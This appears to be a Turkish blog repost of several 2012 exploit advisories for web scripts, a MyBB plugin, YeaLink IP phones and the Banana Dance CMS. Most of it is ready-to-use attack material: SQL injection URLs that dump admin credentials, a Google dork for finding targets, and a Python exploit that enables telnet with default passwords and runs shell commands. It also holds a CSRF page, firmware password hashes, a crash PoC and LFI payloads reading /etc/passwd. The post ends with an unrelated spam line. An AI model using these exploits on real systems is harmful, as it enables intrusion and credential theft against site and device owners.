Guru Auction 2.0 Multiple SQL Injection Vulnerabilities

Guru Auction 2.0 Multiple SQL Injection açığıl Bulundu. “detail.php?item_id=” de meydana gelen sql injection açığı sayesinde, bir takım verilere ulaşılabilmekte. Açık bulucuların açığın oluşum yeri, açığın kullanımı ve açığın yarattığı tehlikelere ilişkin açıklamaları aşağıdaki şekildedir;

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
										.WEB.ID
-----------------------------------------------------------------------
        Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://ycl.sch.id/
Date		: December, 26-2012
Location	: Yogyakarta, Indonesia
Time Zone	: GMT +7:00

Application	: Guru Auction 2.0
Price		: $49
Vendor  	: http://www.guruscript.com/
Google Dork	: inurl:subcat.php?cate_id=
-----------------------------------------------------------------------

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--


Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false


Default Admin Page:
~~~~~~~~~~
http://domain.tld/[path]/admin/

-----------------------------------------------------------------------

Thanks:

LeQhi, lingah, Ozie, m4rc0, g0nz, L1ntang, GheMaX, chainloader, SakitJiwa, Susant, dextone, drubicza, f4c0

City Directory Review and Rating Script (search.php) SQL Injection Vulnerability

City Directory Review and Rating Script (search.php) SQL Injection Açığı bulunmuş olup açığa ilişkin açık bulucunun açıklamaları şu şekilde;

# Exploit Title: City Directory Review and Rating Script SQL Injection
Vulnerability
# Date: 22.12.2012
# Author: 3spi0n
# Script Vendor or Software Link:
http://b-scripts.com/en/18-city-reviewer-yelp-clone.html
# Category: WebApps
# Type: SQL Injection [MySQLi]
# Tested On: Ubuntu 12.10 - Win7

=================================================
# Demo: http://b-scripts.com/demo/city_reviewer/

# MySQLi Detected On:
http://server/city_reviewer/search.php?category=6


=================================================

# My Blog: www.Ryuzaki.in
# Social : Twitter.com/bariiiscan
# My Team: Grayhatz Inc. & Agedz Corp.
# Turkey.

MyBB AwayList Plugin (index.php, id parameter) SQL Injection Vulnerability

MyBB AwayList Eklentisinde SQL Injection Açıkları bulunmuştur. Açık index.php?action=editAwlItem&id=[SQLi] kaynaklanmakta olup, Açık bulucunun Açığın kullanımına ilişkin açıklamalamaları aşağıdaki şekildedir.

# Exploit Title: AwayList MyBB plugin SQLi 0day
# Exploit Author: Red_Hat [Team Vect0r]
# Software Link: http://mods.mybb.com/view/awaylist
# Tested on: Windows & Linux.


Vulnerable code :

<?php
$query = $db->simple_select( // 245
        "awaylist", '*', "id = '" . $mybb->input['id'] . "'" // 246
    ); // 247
    $item = $db->fetch_array($query); // 248
?>

The variable '$mybb->input['id']' remains unsanitized.

Usage : http://server/index.php?action=editAwlItem&id=[SQLi]

Shoutout to Zixem <3 & Team Vect0r :3

YeaLink IP Phone SIP-TxxP firmware 9.70.0.100 Multiple Vulnerabilities

YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 versiyonunda [0x01] - Hidden page to enable telnet + CSRF, [0x02] - Default telnet shell users + passwords alınabilmekte, shadow okunabilmekte olup, perl exploiti ve açık bulucunun açık oluşum yerleri, açığın kullanımına ilişkin açıklamaları aşağıdaki şekildedir; [sourcecode language="plain"]#+--------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 Multiple Vulnerabilities # Date : 12-21-2012 # Author : xistence (xistence<[AT]>0x90.nl) # Software link : http://yealink.com/SupportDownloadfiles_detail.aspx?ProductsID=64&CateID=187&flag=142 # Vendor site : http://yealink.com # Version : 9.70.0.100 and lower # Tested on : YeaLink IP Phone SIP-T20P (hardware VoIP phone) # # Vulnerability : Multiple Vulnerabilities as described below # #+--------------------------------------------------------------------------------------------------------------------------------+ [0x01] - Hidden page to enable telnet + CSRF The hidden page http://<IP>/cgi-bin/ConfigManApp.com?Id=10 contains an option to enable Telnet on the phone. Only the "admin" user can access this page. However the unprivileged user "user" can post directly to ConfigManApp.com and enable Telnet. This default user "user" has the password "user" and is unlikely to be changed by a user. Also CSRF to enable this is possible: <html> <head> <title>Download</title> </head> <body> <form name="csrf" action="http://<IP>/cgi-bin/ConfigManApp.com" method="post"> <input type="hidden" name="PAGEID" value="10"/> <input type="hidden" name="CONFIG_DATA" value="1%261%261%261%260%261%261%260%261%261%260%26%260%260%260%260%260%261%261%260%260"/> </form> <script> document.csrf.submit(); </script> </body> </html> [0x02] - Default telnet shell users + passwords The shell users are hardcoded in the firmware images and are always the same and can't be changed through the webinterface. So after enabling telnet through the hidden page shell access could go unnoticed. /etc/passwd: root:x:0:0:Root,,,:/:/bin/sh admin:x:500:500:Admin,,,:/:/bin/sh guest:x:501:501:Guest,,,:/:/bin/sh /etc/shadow: root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7::: admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7::: guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7::: <- password is "guest" /etc/group: root:x:0:admin,root guest:x:1:guest The file "/tmp/.htpasswd" is world readable and contains the "admin" password for the web interface. [0x03] - Exploit The following exploit logs in with the unprivileged user "user" and password "user" in the web interface. Here it enables telnet, logs in with the default user "guest" and password "guest" and executes the shell command specified. An example is to do a "cat /tmp/.htpasswd" to retrieve the admin password for the web interface. #!/usr/bin/python import urllib, urllib2, getpass, sys, telnetlib print "" print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 hidden page telnet enabler + default guest shell account command execution - xistence (xistence<[at]>0x90.nl) - 2012-12-21" print "" if (len(sys.argv) != 3): print "[*] Usage: " + sys.argv[0] + " <IP of Phone> <command to execute>" print "[*] i.e.:" + sys.argv[0] + " 127.0.0.1 \"cat /tmp/.htpasswd\"" print "" exit(0) phoneIP = sys.argv[1] shellCmd = sys.argv[2] phoneUrl = 'http://%s/cgi-bin/ConfigManApp.com' % phoneIP webUser = 'user' webPass = 'user' telnetUser = 'guest' telnetPass = 'guest' passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, phoneUrl, webUser, webPass) authhandler = urllib2.HTTPBasicAuthHandler(passman) opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) post_params = urllib.urlencode([("PAGEID", "10"), ("CONFIG_DATA", "1%261%261%261%260%261%261%260%261%261%260%26%260%260%260%260%260%261%261%260%260")]) print "[*] Enable telnet on [ %s ] by posting directly to the hidden page with PAGEID=10 parameter as unprivileged user [ user ]" % phoneUrl pagehandle = urllib2.urlopen(phoneUrl, post_params) print "[*] Making telnet connection to [ %s ] with default user [ %s ] and password [ %s ]" % ( phoneIP, telnetUser, telnetPass ) tn = telnetlib.Telnet(phoneIP) tn.read_until("IPPHONE login: ") tn.write(telnetUser + "\n") if telnetPass: tn.read_until("Password: ") tn.write(telnetPass + "\n") tn.read_until("$") print "[*] Executing shell command [ %s ]" % shellCmd tn.write( shellCmd + '\n' ) tn.read_until( shellCmd ) print tn.read_until("$").strip("$ ") tn.write("exit\n") tn.read_all() [0x04] - Remote "/yealink/bin/macd" buffer overflow crash PoC The following PoC exploit will crash the "/yealink/bin/macd" process on port "12345" #!/usr/bin/python import socket,sys,time,struct if len(sys.argv) < 2: print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd remote buffer overflow crash PoC - xistence (xistence<[at]>0x90.nl) - 2012-12-21" print "[-] Usage: %s <target addr> " % sys.argv[0] sys.exit(0) target = sys.argv[1] if len(sys.argv) > 2: platform = sys.argv[2] buffer = "\x41"*75 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((target,12345)) except: print "[-] Connection to "+target+" failed!" sys.exit(0) print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd remote buffer overflow crash PoC - xistence (xistence<[at]>0x90.nl) - 2012-12-21" print "[*] Sending " + `len(buffer)` + " byte crash" s.send(buffer + "\r\n") s.recv(1024) [/sourcecode]

Banana Dance B.2.6 Multiple Vulnerabilities

Banana Dance B.2.6 Versiyonunda Local File İnclude, SQL injection ve post açıkları bulunmuş olup, Açık bulucunun Açığın oluşum yerleri, Açığın Kullanımı ve açık hakkındaki geniş açıklamaları şu şekildedir;

Advisory ID: HTB23118
Product: Banana Dance
Vendor: bananadance.org
Vulnerable Version(s): B.2.6 and probably prior
Tested Version: B.2.6
Vendor Notification: October 3, 2012 
Public Disclosure: December 19, 2012 
Vulnerability Type: PHP File Inclusion [CWE-98], Improper Access Control [CWE-284], SQL Injection [CWE-89]
CVE References: CVE-2012-5242, CVE-2012-5243, CVE-2012-5244
CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Risk Level: High 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Banana Dance, which can be exploited to gain access to sensitive information, perform SQL injection attacks and compromise vulnerable system.


1) PHP File Inclusion in Banana Dance: CVE-2012-5242 

Input passed via the "name" POST parameter to "/functions/ajax.php" is not properly verified before being used in "include_once()" function and can be exploited to include arbitrary local files. This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.

The following PoC (Prof-of-Concept) demonstrates the vulnerability: 


POST /functions/ajax.php HTTP/1.1

action=get_template&name=../../../../../etc/passwd%00



2) Improper Access Control in Banana Dance: CVE-2012-5243

The application does not restrict access to the "/functions/suggest.php" script to unauthenticated users. A remote attacker can read arbitrary information from database.

The following PoC reads data from the 'bd_users' table: 


<form action="http://[host]/functions/suggest.php" method="post">
<input type="hidden" name="return" value="username" />
<input type="hidden" name="display" value="password" />
<input type="hidden" name="table" value="bd_users" />
<input type="hidden" name="search" value="id" />
<input type="hidden" name="value" value="%" />
<input type="submit" id="btn">
</form>



3) SQL Injection in Banana Dance: CVE-2012-5244

3.1 Input passed via the "return", "display", "table" and "search" POST parameters to "/functions/suggest.php" is not properly sanitised before being used in SQL query. Although the "mysql_real_escape_string()" function is called on the input it has no effect due to usage of the ` quotes in SQL query. This vulnerability can be exploited to manipulate SQL queries by injecting arbitrary SQL code. 

The following PoC demonstrates the vulnerability: 


<form action="http://[host]/functions/suggest.php" method="post">
<input type="hidden" name="return" value="id`,version() AS version FROM bd_users LIMIT 1 -- " />
<input type="hidden" name="display" value="version" />
<input type="submit" id="btn">
</form>


3.2 Input passed via the "id" GET parameter to "/functions/widgets.php" is not properly sanitised before being used in SQL query. This vulnerability can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC demonstrates the vulnerability: 

http://[host]/functions/widgets.php?action=get_widget&id=%27%20OR%201=%28select%20min%28@a:=1%29from%20%28select%201%20union%20select%202%29k%20group%20by%20%28select%20concat%28@@version,0x0,@a:=%28@a%2b1%29%2%29%29%29%20--%20

3.3 Input passed via the "category" GET parameter to "/functions/print.php" is not properly sanitised before being used in SQL query. This vulnerability can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC demonstrates the vulnerability: 

http://[host]/functions/print.php?category=0%27%20UNION%20SELECT%20version%28%29%20--%202

3.4 Input passed via the "name" GET parameter to "/functions/ajax.php" is not properly sanitised before being used in SQL query. This vulnerability can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC demonstrates the vulnerability: 


<form action="http://[host]/functions/ajax.php" method="post">
<input type="hidden" name="action" value="get_template" />
<input type="hidden" name="name" value="' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- " />
<input type="submit" id="btn">
</form>


-----------------------------------------------------------------------------------------------

Solution:

Vendor didn't provide a security patch and declined proposal to postpone the disclosure date. 

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23118 - https://www.htbridge.com/advisory/HTB23118 - Multiple vulnerabilities in Banana Dance.
[2] Banana Dance - http://www.bananadance.org - Banana Dance is a free, open source, PHP/MySQL program that takes the best of wiki software and combines it with the best of web content management systems (CMS).
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
ikinci el eşya alan yerler | ikinci el eşya alanlar